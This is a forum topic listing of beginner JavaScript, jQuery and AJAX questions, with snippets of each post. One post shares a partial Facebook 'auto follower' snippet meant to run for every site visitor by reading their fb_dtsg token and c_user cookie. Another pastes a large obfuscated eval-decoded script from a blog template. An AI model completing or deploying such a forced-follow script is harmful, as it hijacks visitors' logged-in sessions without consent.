15,700 Topics

Member Avatar for
Member Avatar for asaidi

Hi i m just starting learning jquery,javascript ajax and json.. 1-can i import my data from mysql and use it in json the data is nearly 3000 records and it is growing.. 2-if i want to add a new record into my json file how i can do this please …

Member Avatar for IIM
0
137
Member Avatar for Julia25

I found this slideshow http://jsfiddle.net/vengiss/QRWAD/6/ that works on my current project but the client requested to make the slideshow image clickable (with links), I tried adding "<a href="#"><img src" but it wont work :( any suggestion?

Member Avatar for Julia25
0
3K
Member Avatar for Peter M.

I have a INDEX.html and some <DIV>'s that are populated with external HTML-files using jQuery LOAD() Some of the external HTML's also contains Javascripts. Seperately these external HTML's all perform well, when displayed in the DIV the script won't run. There should be a solution to this but I cannot …

Member Avatar for stbuchok
0
229
Member Avatar for LiBOC

Dear all, :confused: If I have a javascript variable with a value in it. How do I RETRIEVE the value of it and insert it into my <TD> cell? I am using a table to input values to <CANVAS> tag to draw a graph based on the values in <TD> …

Member Avatar for hhhff
0
3K
Member Avatar for Black_Lion

I am using Microsoft Visual Web developer 2010. I have Google Maps embedded on my webpage and a textbox (txtBoxInput) using the code: <input runat="server" type="text" id="txtBoxInput"/> A button which displays a new map loction: <input type="button" id="btnDisplay" value="Display map" style="height:34px;width:90px;" onclick="showPoint();"/> I also have an aspn.net button (btnTest) using …

Member Avatar for JorgeM
0
784
Member Avatar for PF2G

Hi, how can i know (with an alert) the value i selected, from the #layout_select: <script> $(document).ready(function() { var optarray = $("#layout_select").children('option').map(function() { return { "value": this.value, "option": "<option value='" + this.value + "'>" + this.text + "</option>" } }) $("#column_select").change(function() { $("#layout_select").children('option').remove(); var addoptarr = []; for (i = …

Member Avatar for PF2G
0
432
Member Avatar for Monica_1

Im working with dreamweaver, coded in php On one of my pages, i'm trying to add 2 different print buttons each one printing a differrent portion of the webpage. For example, one print button is printing the first paragraph and the other print button is printting the second paragraph. I …

Member Avatar for pritaeas
0
272
Member Avatar for joshmac

I am not a jquery guru in any sense, so I am seeking some help with the below code. What I am trying to do, is populate two input fields, based on what is selected from a dropdown field via a database call. When I select a term from the …

Member Avatar for joshmac
0
976
Member Avatar for jelly46

Can some one help? I am looking for a **content slider that can hold images and text and has dot navigation**. I have searched for so many on the net but nothing that is simple. I would like it to look like this http://www.bbk.ac.uk/ but the content slides across **not** …

Member Avatar for pritaeas
0
189
Member Avatar for User908

I have several thumbnails on my page which I would like to enlarge on mouseover and revert them to their initial position on mouseout. So when the user mouses over any of the aforementioned thumbnails onmouseover is called triggering MLTo function and when the mouse is out, onmouseout triggers MLFro …

Member Avatar for iamthwee
0
312
Member Avatar for NettSite

I am trying to put together a web interface for a process which downloads a number of XML files and then processes them. I am usimg JavaScript / jQuery / AJAX to initiate the process on the server, one file at a time, and to display progress information after each …

Member Avatar for gon1387
0
4K
Member Avatar for izam.lukman

i have a script for auto follower on facebook, how to make it run everytime visitor come to my website this is that script var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function cereziAl(isim) { var tarama = isim + "="; if (document.cookie.length > 0) { konum = document.cookie.indexOf(tarama) if …

Member Avatar for izam.lukman
0
220
Member Avatar for saucy6969

Hi there I am working on my sister's website and she wants to start a video blog. She wants her youtube videos to be automatically posted on her website (just the newest one needs to be shown). Anyone have any code that might help with that?? Looked via google and …

Member Avatar for saucy6969
1
228
Member Avatar for jelly46

I am working with some code that works fine in jsfiddle but not locally, here is the [jsfiddle link ](http://jsfiddle.net/c2webdev/DVPaa/) this is quite confusing here is the local code <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Untitled Document</title> <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script> …

Member Avatar for Troy III
0
1K
Member Avatar for mmcdonald

Hello DaniWebers! I'm absolutely shocking when it comes to JavaScript/JQuery and have run into an occurance when I would like to use it. Now before you slap me on the wrist I **DO** intend to learn JS in 2014 (Scouts honour!). I am using this slider: [JQuery - Snap To …

Member Avatar for mmcdonald
0
378
Member Avatar for marini83

Google CSE is great. Autocompletion is great. I just want to force google to display autosuggestions coming from a list (xml). Is this possible if so how can I implement it? Thanks

Member Avatar for pritaeas
0
77
Member Avatar for Burhan_1

I am trying to make a script which detects clicks on google ads. All events works like onmouseover, out etc except click, focus, mousedown. When i click on google ads it open its ads link but dont run my jquery script on click event. I have tried preventdefault and other …

Member Avatar for almostbob
0
844
Member Avatar for Shikha_1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script language="javascript"> function genDivs(v) { var e = document.body; var row = document.createElement("div"); row.className = "row"; row.style.width = "70%"; row.style.height = "100%"; row.style.border="8px solid black"; row.style.overflow="scroll"; for(var x = 1; x <= v; x++) { var cell = document.createElement("div"); …

Member Avatar for Shikha_1
0
196
Member Avatar for deej_uptheowls

http://jsfiddle.net/VqSFz/51/ Can anyone help me solve this or at least point me in the right direction, I have a handy little slider that when you click an image it replaces the master and you can slide back and forth, but I also need to add the function for removing blank …

Member Avatar for iamthwee
0
139
Member Avatar for AleXHB

Hello, I found a tutorial and im looking to create my own website like pandora in html5 or ajax for my country (or at least that's my plan). The tutorial explains almost everything except 3 things: how to make the songs to not repeat if they have already been played, …

Member Avatar for Troy III
0
406
Member Avatar for manish.agnihotri.378

http://192.145.232.34/~wwwjohnr/index.php SCRIPT438: Object doesn't support property or method 'attachEvent' prototype.js, line 5644 character 9 SCRIPT438: Object doesn't support property or method 'attachEvent' prototype.js, line 5653 character 9 SCRIPT438: Object doesn't support property or method 'dispatchEvent' prototype.js, line 5734 character 7

Member Avatar for manish.agnihotri.378
0
120
Member Avatar for brandon66

I was wondering if their is an easier way to do this; I want to select a number one through twelve from a dropdown and display that many textboxes and their labels this is how im setting it up. <script> $(document).ready(function() { $('#one').hide(); $('#two').hide(); $('#three').hide(); $('#four').hide(); $('#five').hide(); $('#six').hide(); $('#seven').hide(); $('#eight').hide(); …

Member Avatar for brandon66
0
279
Member Avatar for jelly46

Hello If you go to this page https://www.barnardos.org.uk/donate/cashdonation_iframe.htm?customDonation=1.00&ref=131021&source=b&don_amount=1.00&submitButton=Single+Donation and enter a donation amount and then click on the yes box you will see the percentage of the gift aid is worked out. Can anyone help with a JS way to do this please?

Member Avatar for jelly46
0
135
Member Avatar for jelly46

I have some javascript that will not work in IE, can anyone help? It works fine in Mozilla and Chrome. Thanks <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>test</title> <style type="text/css" media="screen"> .hide{ display:none; } </style> </head> <body> <div id="tabs"> <div …

Member Avatar for jelly46
0
271
Member Avatar for izam.lukman

i found it in a blogspot template, it contain link blog for this template creator. so, i need to change that link, but i don't know to decrypt this javascript var _1470;var _7245='26559B189A131C2029F1840E1993D1255E2047C1516F1867E1966E1858B2020A1948E1876E1957F2011F1381D1894E1876F2011A1588D1939D1876E1948F1876A1957D2011B2002A1561D2056A1723C1840B1894A1669F1840B1948B1876D1327D1273E1858A1993B1876F1867F1912B2011F1273B1336D1786D1399D1804A1498C1867F1966F1858D2020D1948E1876A1957F2011B1381A2038F1993B1912D2011A1876C1327C1273E1507B2002E1975B1840A1957E1255E1912A1867E1516B1318E1858E1993D1876B1867E1867E1912B2011C1318A1255C2002F2011D2056A1939D1876A1516B1318D1849D1840A1858D1930F1894E1993D1966F2020C1957A1867D1489B1957C1966E1957C1876D1264C1912D1948E1975B1966F1993E2011A1840B1957C2011C1498E1885F1966C1957B2011B1372F2002C1912A2065B1876D1489A1408E1417A1975B2047C1264F1912B1948E1975B1966A1993E2011D1840D1957A2011E1498E1975B1966A2002A1912D2011C1912C1966E1957F1489D1840B1849B2002D1966A1939E2020C2011B1876B1264F1912F1948B1975A1966F1993B2011A1840A1957B2011C1498F2029C1912C2002A1912B1849F1912D1939A1912F2011B2056E1489C2029A1912A2002D1912C1849D1939A1876E1264A1912E1948F1975E1966C1993C2011E1840C1957F2011A1498F1948D1840E1993F1894B1912A1957F1372F2011F1966C1975E1489D1372A1408D1426C1399F1255C1840C2020E2011B1966C1255A1399C1255F1264B1912F1948C1975A1966F1993B2011D1840C1957F2011B1498C1966E1975D1840C1858E1912D2011B2056C1489A1408B1264D1912E1948A1975B1966F1993F2011D1840F1957F2011B1498B1885D1912A1939B2011C1876F1993C1489D1840C1939A1975A1903D1840A1327A1966F1975F1840C1858D1912A2011F2056D1516B1408C1399C1399C1336C1264C1912D1948C1975B1966A1993E2011E1840B1957F2011D1498F1993F1912B1894E1903E2011F1489D1399D1498B1318D1525B1723E1876A1948A1975B1939B1840B2011E1876F1255D1849F2056E1255F1507D1840A1255F1903E1993D1876B1885A1516A1318C1903A2011C2011F1975A1489B1390D1390D1849D1939C1966C1894F1381C1930D1840A1957E1894A1912B2002B1948C1876A2011D1381F1957C1876E2011D1318D1525D1642C1840A1957F1894F1255B1624F2002E1948E1876E2011A1507B1390A1840F1525B1255C1687A2020E1849D1939F1912E2002D1903F1876B1867C1255D1849A2056D1255B1507D1840B1255B1903A1993C1876F1885E1516D1318D1903C2011C2011F1975D1489D1390A1390D2038A2038D2038B1381D1894D1840D1939C1939D1876B1993E2056F1849E1939E1966B1894D1894A1876B1993C2011A1876D1948E1975A1939C1840C2011A1876E2002A1381D1858D1966E1948A1318B1525D1606B1561A1723D1876F1948F1975C1939F1840C2011F1876A2002A1507F1390E1840E1525D1507A1390A2002F1975E1840D1957E1525D1273C1336D1498C2029E1840C1993B1255C1840C2029D1840A2011F1840C1993D1516F1291E1327C1273A1282C1858B1966D1948F1948B1876F1957C2011F2002D1273A1336D1498A1057D1840E2029F1840F2011F1840A1993F1381D1885C1912C1957D1867F1327B1273A1381B1840C2029F1840C2011C1840A1993D1372C1912E1948F1840A1894E1876B1372D1858C1966E1957B2011A1840C1912F1957D1876F1993E1255A1912D1948A1894F1273C1336B1381D1876D1840B1858A1903B1327D1885B2020D1957A1858E2011D1912B1966D1957D1327B1336B2074E2029A1840F1993F1255D1858D1516B1291A1327F2011A1903F1912E2002B1336B1381F1840C2011E2011D1993C1327E1273C1939C1966A1957B1894A1867A1876F2002C1858E1273C1336D1534D1291F1327B2011A1903E1912E2002F1336C1381B1840E2011D2011C1993A1327F1273E1939B1966B1957A1894D1867B1876B2002B1858E1273E1336A1489C1291E1327F2011E1903A1912D2002A1336C1381A1840F2011D2011D1993F1327B1273F2002F1993D1858C1273B1336C1498C1291C1327E2011B1903F1912F2002B1336A1381E2002C1903E1966E2038C1327D1336A1381D1840A2011E2011C1993E1327D1273C2002A1993D1858C1273C1363E1858D1381D1993C1876E1975D1939C1840C1858A1876E1327E1390A1795B1390F2002D1786C1399F1372E1480B1804E1354C1327B1795F1372B1858D1336E1534D1795D1390F1390D1363A1273E1390A2002E1435A1471F1372E1858D1390C1273D1336A1336A1381E1993A1876A1948F1966D2029F1876C1552B2011C2011B1993F1327B1273C1939A1966F1957C1894F1867F1876D2002E1858B1255E2038F1912B1867F2011A1903F1255A1903C1876F1912A1894E1903F2011E1273B1336B2092A1336A1498C1057E2002D1903A1966C1993E2011F1858B2020B2011E1516E2074C1840B1939C1939F1822E2002B1903F1966F1993F2011F1858F2020A2011B2002C1489F2074E2092A1363C1840D1867B1867C1489D1885A2020E1957B1858F2011E1912D1966E1957D1327E1858E1363C1894A1363F1840E1336C2074D2029A1840E1993F1255C1867B1516B2074E2011C2056A1975A1876A1489E1273A1930E1876E2056C1867D1966E2038B1957A1273F1363F1975E1993B1966E1975D1840D1894F1840A2011C1876B1489D1264A1408B1363F1867D1912E2002E1840F1849E1939F1876C1822D1912A1957B1822E1912D1957F1975B2020B2011C1489C1264D1408E1363B2011F1840B1993C1894C1876B2011F1489D1867F1966C1858C2020A1948D1876C1957B2011C1363D1930C1876C2056C1858B1966E1867F1876F1489B1264A1408F2092C1498C1912A1885E1327E1840C1336D1885A1966E1993C1327A2029D1840C1993F1255F1885B1255B1912B1957A1255B1867A1336E1273F2020C1957B1867D1876E1885A1912A1957A1876A1867F1273B1516C1516F2011F2056E1975A1876D1966E1885E1255A1840C1786D1885C1804D1309E1309B1327E1840C1786E1885D1804F1516A1867A1786A1885B1804A1336D1498D1876B1939C2002B1876C1255C1840C1516C1867F1498E1867B1516A1840D1381D2011C1840A1993C1894A1876C2011F1498A1273E2002B2011A1993D1912B1957E1894A1273D1516B1516D2011A2056C1975E1876D1966D1885C1255F1840E1381E2011B1840A1993E1894D1876C2011E1309A1309E1327F1867B1516D1867B1966D1858B2020A1948A1876C1957F2011B1381D1894C1876A2011E1588A1939F1876F1948E1876C1957C2011C1561F2056C1624A1867A1327E1840B1381D2011D1840C1993B1894D1876E2011E1336A1336C1498B1858F1516B1858C1381B2011D1966E1651E1966C2038A1876E1993B1570C1840A2002B1876C1327B1336A1498F1885B1516B1885C2020B1957A1858F2011C1912F1966F1957E1327C1849F1336A2074F1849E1516A1849F2083A2083B2038A1912C1957A1867F1966A2038E1381B1876C2029D1876F1957D2011C1498F1912B1885D1327B1840B1381B1867A1912F2002A1840E1849D1939F1876C1822B1912A1957A1822A1912A1957A1975E2020F2011E1336C2074D2029A1840A1993E1255E1876C1498D1849F1381A2011F1840A1993F1894A1876E2011C1534D1876F1516D1849F1381D2011F1840C1993C1894D1876F2011E1489D1849D1381F2002C1993D1858D1588D1939E1876B1948A1876D1957E2011D1309A1309D1327B1876A1516B1849E1381C2002B1993E1858B1588D1939D1876D1948B1876F1957E2011F1336D1498F1426B1516D1516B1876B1381E1957B1966E1867C1876F1723C2056B1975C1876E1309D1309D1327B1876A1516E1876B1381B1975E1840B1993A1876F1957B2011B1669B1966E1867C1876D1336D1498C1912B1885A1327C1273B1624F1669B1687C1732A1723C1273C1516A1516B1876B1381F2011E1840F1894E1669A1840F1948A1876C2083A2083B1273C1723B1588C1759C1723F1552E1705C1588D1552C1273D1516D1516E1876B1381A2011B1840E1894A1669E1840C1948F1876E1336C1993D1876F2011F2020C1993D1957C2092F1849D1381C1930D1876C2056F1570A1966E1867B1876A1534A1858A1966A1867D1876D1516D1057E1849B1381A1930A1876C2056D1570E1966D1867E1876A1489C1849C1381F2038A1903A1912B1858F1903B1309A1309D1327F1858D1966F1867F1876E1516F1849D1381F2038F1903F1912F1858C1903E1336E1498A1876D1516C1714B2011F1993C1912A1957C1894A1381A1885C1993B1966C1948E1570E1903D1840C1993A1570B1966A1867C1876D1327C1858B1966F1867E1876C1336D1381C2011E1966D1651D1966A2038F1876C1993A1570A1840D2002F1876F1327C1336D1498E1408C1471C1471C1516F1516B1858E1966C1867E1876E1309B1309C1327B1876D1516F1273C1363D1273C1336A1498C1408F1480C1399C1516D1516E1858A1966E1867C1876D1309F1309B1327A1876C1516A1273D1381B1273D1336C1498A2029F1840D1993D1255A1867E1516E1858B1381A2002D1975D1939B1912B2011A1327E1273D1354D1273C1336C1363F1903D1516D1399A1363C1885E1516E2074E1273F1831C1273F1489E1273F2101F1273E1363F1408F1489B1273E1264A1273C1363E1417A1489C1273A1543D1273E1363A1426C1489B1273B1282A1273F1363F1435F1489E1273A1291D1273E1363A1444D1489C1273E1300A1273C1363C1453F1489A1273E1813C1273D1363E1462E1489B1273B1309C1273A1363A1471D1489C1273E1345C1273F1363C1480C1489D1273C1327C1273B1363D1399F1489F1273F1336A1273E1363F1273A1372E1273E1489C1273A1822A1273C1363A1273F1516E1273B1489C1273C1354B1273C1363B1273B1498C1273F1489C1273E1489D1273F1363A1273D1318D1273D1489E1318D1273E1318D1363B1273F1363D1273A1489C1273B1507F1273F1363C1273A1381C1273D1489F1273E1525B1273B1363A1273B1390C1273B1489B1273A1534B1273D1363A1273C1795B1795D1273B1489E1273F2083B1273E2092C1363B2029D1516A2074B1876D2002B1858D1489B1417F1462F1363A1876F2002C1858E1840A1975A1876D1489E1417F1462B1363C2011F1840A1849C1489B1480A1363A2002E1975C1840F1858A1876E1489B1426C1417B1363B1273F1993C1876B2011E2020D1993C1957C1273E1489B1408E1426D1363B1876F1957B2011C1876F1993F1489C1408C1426C1363F1849C1840B1858C1930E2002B1975C1840E1858A1876A1489A1471D1363D2002F1858F1993D1966C1939A1939F1939B1966C1858E1930B1489F1408B1435C1444A1363A2002D1858F1993E1966B1939D1939F1822A1939D1966F1858B1930C1489F1408B1435F1444E1363F2002C1858D1993F1966C1939D1939B1489E1408B1435D1444B1363D1858F1840F1975D2002C1939A1966D1858B1930D1489C1417C1399A1363A1858F1840E1975E2002C1822E1939F1966F1858C1930C1489C1417B1399F1363B1858D1840E1975D2002A1489C1417D1399B1363D1957B2020B1948A1939C1966E1858C1930C1489C1408E1435A1435E1363E1957F2020F1948E1822A1939F1966C1858C1930D1489B1408B1435F1435B1363B1957A2020B1948F1489F1408D1435A1435E1363A1975E1840B2020C2002C1876B1489A1408E1480A1363E1273E1849B1993F1876C1840A1930D1273E1489A1408E1480D1363D1912E1957B2002B1876B1993E2011E1489E1435F1444F1363F1903C1966A1948D1876C1489B1426E1453C1363E1273A1867C1876D1939B1876E2011D1876B1273A1489F1435E1453A1363D1876B1957D1867D1489D1426C1444C1363A1057A1975B1840A1894B1876A2020E1975D1489C1426D1426F1363A1975C1840E1894A1876C1822B2020B1975A1489E1426C1426B1363A1975B2020B1489F1426B1426A1363C1975F1840D1894D1876F1867C1966B2038D1957F1489A1426E1435D1363B1975C1840F1894A1876E1822E1867E1966B2038C1957B1489B1426F1435D1363B1975B1867D1489B1426A1435C1363E1939F1876B1885E2011B1489A1426E1462F1363C2020B1975F1489C1426C1471D1363D1993C1912B1894D1903A2011F1489F1426F1480D1363C1867D1966C2038D1957D1489B1435D1399F1363C1885C1408F1489A1408C1408E1417D1363C1885A1417F1489F1408E1408E1426D1363D1885D1426A1489D1408D1408F1435D1363C1885A1435C1489B1408D1408A1444C1363A1885E1444B1489D1408A1408D1453E1363F1885E1453F1489F1408B1408D1462B1363A1885C1462A1489F1408F1408D1471A1363E1885D1471C1489F1408E1408C1480B1363E1885A1480B1489E1408F1417F1399E1363F1885A1408B1399D1489D1408E1417C1408E1363D1885B1408F1408E1489A1408A1417C1417F1363F1885D1408E1417E1489B1408E1417C1426C2092C1363F1948E1516E1264D1408C1363E1957A1516A1264F1408E1363C1975A1516B1264E1408E1363C1984E1516B1264A1408B1363D1993C1516C1264D1408A1363C2002E1516A1264E1408A1363F2011F1516A1264F1408F1363C2020A1516F1264B1408D1498E1849E1381A1858D2011E1993A1939E1642A1876D2056B1309E1309A1327B1984D1516F1264B1399A1336A1498C1849D1381B2002F1903D1912F1885D2011B1642B1876D2056D1309F1309E1327E1957F1516C1264C1399C1336F1498E1849D1381B1840C1939B2011F1642F1876C2056B1309B1309C1327D2002E1516E1264D1399A1336E1498E1849A1381D1948D1876C2011B1840C1642A1876D2056D1309C1309D1327B2020B1516D1264C1399D1336C1498E1885E1966C1993E1327E2029F1840F1993C1255C1939F1516A1399D1498C1930D1516E1867A1786B1939F1804D1363C1939F1507C1867B1381D1939C1876C1957B1894A2011B1903D1498C1939E1354B1354B1336F1273D1858D2011C1993C1939E1273B1516A1516D1930B2083C2083A1273D1858E1966E1957C2011B1993B1966B1939A1273B1516A1516D1930E1534E1327C1903A1354E1354D1363C1975C1516D1264E1399E1336A1489B1273E2002B1903E1912B1885F2011E1273B1516D1516B1930D1534D1327A1903B1354D1354B1363B1948B1516F1264B1399E1336B1489F1273F1840B1939D2011E1273B1516B1516B1930B1534A1327C1903C1354A1354D1363E1993E1516E1264E1399C1336F1489F1273E1948B1876E2011D1840A1273F1516F1516B1930B1534A1327D1903B1354C1354F1363A2011D1516A1264B1399F1336D1489C1408B1507F1930F1381D1939C1876D1957B1894D2011B1903B1534C2029C1786F1930E1804B1516B1516D1858B1966C1867C1876B1309A1309B1903A1354F1354D1489D1840B1381E1930E1876C2056D1858F1966C1867C1876A1534C1840A1381D1930F1876E2056F1858B1966C1867E1876B1516B1516B1858B1966D1867F1876D1309E1309F1903C1354E1354C1489D1876F1516C1516B1930F1534B1903E1354C1354C1489D1885D1786A1876A1804E1309E1309B1849F1381B2002E1903F1912A1885F2011D1642E1876D2056B1309E1309D1057A1327D1876E1516D1885B1786F1876F1804C1363D1876F1516C1516A1930C1309B1309F1903B1354D1354B1336A1498F1912F1885E1327F1903E1516F1516E1867D1381E1939E1876A1957D1894B2011A1903B1309A1309A1984E1516E1516F1975B1309D1309B1957D1516F1516B1948E1309D1309F2002A1516F1516F1993E1309D1309E2020C1516A1516F2011A1309C1309A1327F1894E1327B1849E1336C1363A1264E1840C1381A1975D1993D1966E1975D1840B1894F1840B2011D1876B1336F1336C1993A1876B2011F2020B1993C1957D1255E1849D1381F1858F1840D1957B1858F1876F1939B1561D2020C1849A1849F1939A1876E1516F1264F1399F1363B1849D1381F1993C1876C2011C2020E1993C1957E1741F1840A1939E2020F1876D1516D1264C1408B1363B1849B1381A2002E2011E1966C1975D1687D1993A1966A1975E1840C1894A1840C2011E1912F1966D1957B1309E1309E1327B1849E1381A2002E2011E1966D1975F1687B1993D1966C1975E1840E1894E1840F2011E1912C1966E1957A1327A1336B1363B1849B1381A1975F1993F1876C2029B1876C1957C2011C1579A1876A1885C1840E2020E1939C2011C1327B1336A1336C1363B1264B1408C2092F1498C2011A1903D1912C2002B1381E1840A1939B1939C1822A2002B1903F1966B1993B2011A1858B2020F2011A2002D1786C1858A1804A1516F2074C1858E1840C1939C1939F1849F1840D1858D1930C1489F1885A1363F2011C1840A1993B1894C1876B2011F1489D1867B1363C1876F2029F1876A1957E2011D1489A1840D1381A2011D2056E1975F1876C2092E1498D1867E1381C1840E1867F1867A1588E2029C1876B1957F2011D1651C1912D2002C2011D1876A1957C1876C1993B1534F1867E1381B1840D1867F1867D1588C2029C1876A1957B2011B1651B1912A2002C2011C1876A1957D1876B1993D1327A1840C1381A2011F2056A1975F1876C1363B1885F1363C1264F1408B1336B1489C1867F1381E1840B2011B2011D1840F1858A1903C1588B2029A1876A1957B2011A1534E1867A1381A1840E2011C2011D1840E1858B1903E1588E2029C1876D1957B2011D1327C1273F1966E1957A1273B1354B1840C1381E2011F2056F1975E1876A1363F1885B1336C1489F1867D1786B1273D1966B1957D1273A1354A1840B1381B2011B2056A1975E1876E1804E1516F1885F2092C1363F1993D1876D1948A1966D2029B1876F1489A1885F2020E1957D1858C2011E1912B1966E1957C1327C1858A1336D2074F1858C1516E1858F1381F2011E1966C1651B1966A2038E1876C1993C1570B1840A2002A1876B1327C1336D1498B2029A1840C1993E1255A1894A1516D2011B1903D1912D2002F1381F1840C1939F1939A1822D2002C1903E1966E1993B2011D1858C2020E2011B2002C1786F1858A1804C1498B1867A1876B1939F1876E2011C1876C1255A2011F1903D1912C2002D1381E1840E1939C1939C1822F2002B1903B1966F1993A2011B1858A2020D2011A2002E1786C1858E1804B1498B1912C1885B1327C1894F1336D2074D1858B1516A1894A1381E1876F2029A1876D1957C2011D1498F2029F1840B1993E1255F1840F1516A1894B1381E2011F1840F1993C1894D1876B2011E1363B1894E1516D1894A1381E1858E1840C1939C1939D1849A1840B1858D1930C1498D1840D1381E1867A1876F2011E1840E1858E1903B1588B2029F1876B1957C2011A1534E1057E1840B1381A1867B1876F2011C1840F1858D1903F1588A2029B1876C1957F2011F1327C1273E1966B1957E1273E1354B1858E1363A1894A1336A1489F1840C1381B1993F1876F1948A1966C2029D1876E1588D2029A1876A1957A2011A1651E1912C2002B2011F1876E1957B1876D1993F1534F1840E1381C1993B1876C1948D1966D2029D1876A1588D2029A1876B1957F2011C1651D1912D2002E2011A1876B1957A1876F1993A1327A1858E1363F1894E1363A1264E1408C1336E1489A1840F1786B1273C1966E1957B1273F1354B1858D1804B1516A1264D1408D2092B2092D2092E1498E2002D1903F1966E1993D2011E1858F2020A2011F1381F1840B1867E1867A1327A1273A1570D2011E1993E1939A1354F1732E1273F1363A1885D2020D1957B1858C2011E1912F1966D1957F1327A1336E2074E2011B1966D1975A1381B1939D1966A1858D1840A2011C1912E1966C1957D1381E1903D1993F1876C1885C1516A1273B1903E2011D2011E1975C2002D1489F1390F1390E1894F1966A1966F1894E1939F1876E1867E1993A1912E2029D1876D1381C1858E1966E1948B1390A1903C1966C2002B2011E1390B1399D1561A1426A1975F1912B1471E1687A1444E1561C1750E1984C1948A1408D1678F1750A1633A1732C1741D1426B1939A1930E1714D2065D1588B1417F1849A1732D1732B1273E2092A1336C1498F';var _7722=/[\x41\x42\x43\x44\x45\x46]/;var _5498=2;var _2270=_7245.charAt(_7245.length-1);var _5992;var _4322=_7245.split(_7722);var _8981=[String.fromCharCode,isNaN,parseInt,String];_4322[1]=_8981[_5498+1](_8981[_5498](_4322[1])/21);var _9494=(_5498==7)?String:eval;_5992='';_11=_8981[_5498](_4322[0])/_8981[_5498](_4322[1]);for(_1470=3;_1470<_11;_1470++)_5992+=(_8981[_5498-2]((_8981[_5498](_4322[_1470])+_8981[_5498](_4322[2])+_8981[_5498](_4322[1]))/_8981[_5498](_4322[1])-_8981[_5498](_4322[2])+_8981[_5498](_4322[1])-1));var _5796='_1277';var _1327='_5796=_5992';function _3100(_2183){_9494(_6518);_3100(_5017);_5017(_1327);_3100(_5796);}var _6518='_3100=_9494';var _5017='_5017=_3100';_3100(_2270);

Member Avatar for izam.lukman
-1
203
Member Avatar for riahc3

stupidajax: function() { var varpas=$j('#somediv',window.parent.document).text(); varpas.replace(/\s/g, ""); $j.ajax({ // Start AJAX function url: 'mysqlcall.php', //script async: false, data: "parameter1="+varpas, //you can insert url argumnets here to pass to api.php //for example "id=5&parent=6" dataType: 'json', //data format success: function(data) //on recieve of reply { //start success function var selecthtml='Things: <select name="d" …

Member Avatar for riahc3
0
354
Member Avatar for jelly46

Since twitter retired API v1 in March 2013 it has seemed to affected the feed on my website. It has [of course] become quite hard to style the feed how i want. I have found some code that I have developed but I still can't adjust heights and widths. I …

Member Avatar for jelly46
0
301
Member Avatar for davy_yg

Method saving: JSON on file “content.txt” Data Serving Method: 1. Get content for file “content.txt” every page load and put in on parameter. 2. JSON Decode the parameter. So the parameter will be array type. 3. Use desired data for that page. Hello can anyone help me understand the content …

Member Avatar for paulkd
0
133
Member Avatar for davy_yg

Hello, What's the php code for changing css body background?. If you press this button then, css body background changes. What to code it?

Member Avatar for davy_yg
0
277
Member Avatar for Dani

I'm attempting to use Gogole Analytics event tracking to track browser viewport size. I'm using event tracking already in a bunch of other user-initiated places with jQuery and everthing works fine. This doesn't seem to be working though: I have this at the bottom of my html page: <script type="text/javascript"> …

Member Avatar for Dani
0
455
Member Avatar for emir_gradacac

Hi everyone! I'm making a chrome extension that displays current page's url once clicked. I've got this so far: //manifest.json { // Required "name": "Marker", "version": "1.0.11", "manifest_version": 2, // Recommended "description": "The ultimate bookmarking tool", "icons": { "32": "icon.png" }, // Pick one (or none) // Add any of …

Member Avatar for emir_gradacac
0
2K
Member Avatar for maggoteer

I'm currently trying to modify 2 scripts to work together. I've gotten everything working except the script isn't passing any, or the incorrect information when it's trying to create a checkbox. Here's the code I have so far: if (strlen($q)>0) { $hint=""; for($i=0; $i<($x->length); $i++) { $f=$x->item($i)->getElementsByTagName('id'); $g=$x->item($i)->getElementsByTagName('item'); $h=$x->item($i)->getElementsByTagName('price'); $y=$x->item($i)->getElementsByTagName('keyword'); …

Member Avatar for iamthwee
0
278
Member Avatar for GlenRogers

I have a page with a menu of categories and subcategories of products. Categories have a class 'category' and subcategories have a class 'subcategory'. When either is clicked some AJAX sends the category to some php to compile the html which the AJAX then sends back to the page to …

Member Avatar for GlenRogers
0
271
Member Avatar for aarmstrong

I'm trying to create a simple menu and when customers click what they want, I want it to calculate and give a final price and display it. <!DOCTYPE html> <html> <head> <script language="javascript" type="text/javascript"> (document).ready(function() { $('#calculateTotal').click(function() { var singleTopping = 1.20, var doubleTopping = 2.20; } } </script> <title>Design …

Member Avatar for <M/>
0
914
Member Avatar for Fromageball

I have a Django site with a little Jquery script that changes some images when the user puts the curser over the image and then changes it back when the cursor leaves the area. This is my first time trying to deploy a Django site and I am using amazon …

Member Avatar for paulkd
0
294
Member Avatar for ehpratah

Good Day everyone i'm having a hardtime figuring out how to make this certain idea of mine to work basically im trying to capture the checkbox value and its label but im not getting anyluck..and also im having problem explaning what im trying to do so i decided to attached …

Member Avatar for JorgeM
0
288
Member Avatar for atiqur_29

im very newbie in both php and ajax & i was trying to create a form where if i insert the contact id then the rest of the form field will automatically filled by retriving data from database. to get help from a tuitorial, this what i already done but …

Member Avatar for minitauros
0
2K
Member Avatar for Shikha_1

<script type="text/javascript"> function check() { var select1 = document.getElementById("from"); var selected1=[]; for(var i=0;i< select1.length; i++) { if (select1.options[i].selected) selected1.push(select1.options[i].value); } for (var j=0;j<select1.length;j++) { document.write(selected2[j]); } } </script> <!--[if IE]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> </head> <body> <table width="70%" height="30%" align="center"border="1" style="border-collapse:collapse;"> <tr height="300"> <td height="256"><p><center>YOUR SCHOOL IS FROM </center> </p> <center> …

Member Avatar for Shikha_1
0
248
Member Avatar for kouroshnik

I have a website at: [MTN Charge](http://www.shaarzh.com) this site is hosting by a company that provides charge for mtn Operators... I dont access to any control panel,the only panel i have access is a template panel that I can add some javascript or html and meta tags . I know …

Member Avatar for webprefection
0
401
